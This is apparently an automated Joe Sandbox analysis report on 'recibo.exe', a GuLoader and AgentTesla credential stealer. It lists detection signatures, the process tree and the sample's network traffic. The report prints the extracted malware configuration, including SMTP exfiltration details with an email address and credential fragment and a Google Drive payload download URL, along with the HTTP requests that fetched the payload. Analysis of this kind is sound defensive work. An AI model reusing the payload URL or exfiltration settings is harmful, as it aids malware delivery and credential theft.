Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
recibo.exe

Overview

General Information

Sample Name:recibo.exe
Analysis ID:635097
MD5:4680729edca682d1b6de8cf875bbfdf5
SHA1:debf5126050330ecbfc29582d979101cd557dd42
SHA256:e18032a74c8138c907ab2b6937ce66a4483a85e89b05a25153499efee4e85898
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • recibo.exe (PID: 4332 cmdline: "C:\Users\user\Desktop\recibo.exe" MD5: 4680729EDCA682D1B6DE8CF875BBFDF5)
    • CasPol.exe (PID: 416 cmdline: "C:\Users\user\Desktop\recibo.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 432 cmdline: "C:\Users\user\Desktop\recibo.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "administracion@cortijocuevas.comAdm403mail.cortijocuevas.comchinastrapex@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.23175826600.0000000000D00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: CasPol.exe PID: 432JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000004.00000000.23175826600.0000000000D00000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS"}
            Source: recibo.exe.4332.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "administracion@cortijocuevas.comAdm403mail.cortijocuevas.comchinastrapex@gmail.com"}
            Multi AV Scanner detection for submitted file
            Source: recibo.exeVirustotal: Detection: 55%Perma Link
            Source: recibo.exeMetadefender: Detection: 25%Perma Link
            Source: recibo.exeReversingLabs: Detection: 50%
            Source: recibo.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\recibo.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\dadoJump to behavior
            Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.11.20:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49763 version: TLS 1.2
            Source: recibo.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: lgpllibs.pdb source: lgpllibs.dll.1.dr
            Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\devapi\Win8Beta\x64\bin\vm3ddevapi64-debug.pdb source: vm3ddevapi64-debug.dll.1.dr
            Source: Binary string: C:\dev\UCDE\hallasan_gothamjarvis_4\ThirdParty\POG\HP.SmartApp.UCDE.Win32.Lib\HP.SmartApp.UCDE.Win32.Exe\obj\x64\Release\HPSUPD-Win32Exe.pdb source: HPSUPD-Win32Exe.exe.1.dr
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\Local\Temp\Rekorddage.Res7Jump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\Local\Temp\FLADBARMEDES.tubJump to behavior

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkill7f0g8rg2nidoteuikk5gii/1653650775000/00619175272154792338/*/1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-cc-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49764 -> 168.119.38.32:587
            Source: global trafficTCP traffic: 192.168.11.20:49764 -> 168.119.38.32:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000004.00000002.28075571042.000000001D4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000004.00000002.28076991037.000000001D5C6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98Z0mcMphF90Ln.net
            Source: CasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://BPNlDG.com
            Source: CasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: lgpllibs.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cortijocuevas.com
            Source: CasPol.exe, 00000004.00000002.28083404305.000000001F632000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28051758174.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: CasPol.exe, 00000004.00000003.23356845957.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23357279169.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28052337111.0000000001088000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000004.00000003.23356845957.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23357279169.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28052337111.0000000001088000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: lgpllibs.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
            Source: lgpllibs.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
            Source: lgpllibs.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.cortijocuevas.com
            Source: recibo.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000004.00000002.28083404305.000000001F632000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28051758174.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://ocsp.digicert.com0L
            Source: lgpllibs.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://s2.symcb.com0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://sv.symcb.com/sv.crt0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://sv.symcd.com0&
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
            Source: iso_639-3.xml.1.drString found in binary or memory: http://www.sil.org/iso639-3/
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://www.symauth.com/cps0(
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://www.symauth.com/rpa00
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://www.vmware.com/0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: http://www.vmware.com/0/
            Source: CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt0
            Source: CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zerossl.ocsp.sectigo.com0
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: https://d.symcb.com/cps0%
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drString found in binary or memory: https://d.symcb.com/rpa0
            Source: CasPol.exe, 00000004.00000002.28051758174.0000000001039000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-cc-docs.googleusercontent.com/
            Source: CasPol.exe, 00000004.00000002.28051958179.000000000105A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23356845957.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23357279169.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28052337111.0000000001088000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361732323.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-cc-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlki
            Source: CasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-cc-docs.googleusercontent.com/e
            Source: CasPol.exe, 00000004.00000002.28051387241.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000004.00000002.28051387241.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/p
            Source: CasPol.exe, 00000004.00000002.28051758174.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS
            Source: CasPol.exe, 00000004.00000002.28076011744.000000001D510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.28076011744.000000001D510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000004.00000002.28076011744.000000001D510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.28076011744.000000001D510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: lgpllibs.dll.1.drString found in binary or memory: https://mozilla.org0
            Source: CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: CasPol.exe, 00000004.00000002.28076011744.000000001D510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.dr, lgpllibs.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: CasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkill7f0g8rg2nidoteuikk5gii/1653650775000/00619175272154792338/*/1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-cc-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.11.20:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49763 version: TLS 1.2
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056DE
            Source: recibo.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_0040755C1_2_0040755C
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_00406D851_2_00406D85
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_71541BFF1_2_71541BFF
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC42E91_2_02CC42E9
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC2B9D1_2_02CC2B9D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB16EC1_2_02CB16EC
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB06E21_2_02CB06E2
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB7AE61_2_02CB7AE6
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB8AFC1_2_02CB8AFC
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0AF41_2_02CB0AF4
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0A9F1_2_02CB0A9F
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB02AD1_2_02CB02AD
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB16AD1_2_02CB16AD
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0ABE1_2_02CB0ABE
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB7E481_2_02CB7E48
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC52691_2_02CC5269
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB067A1_2_02CB067A
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB02791_2_02CB0279
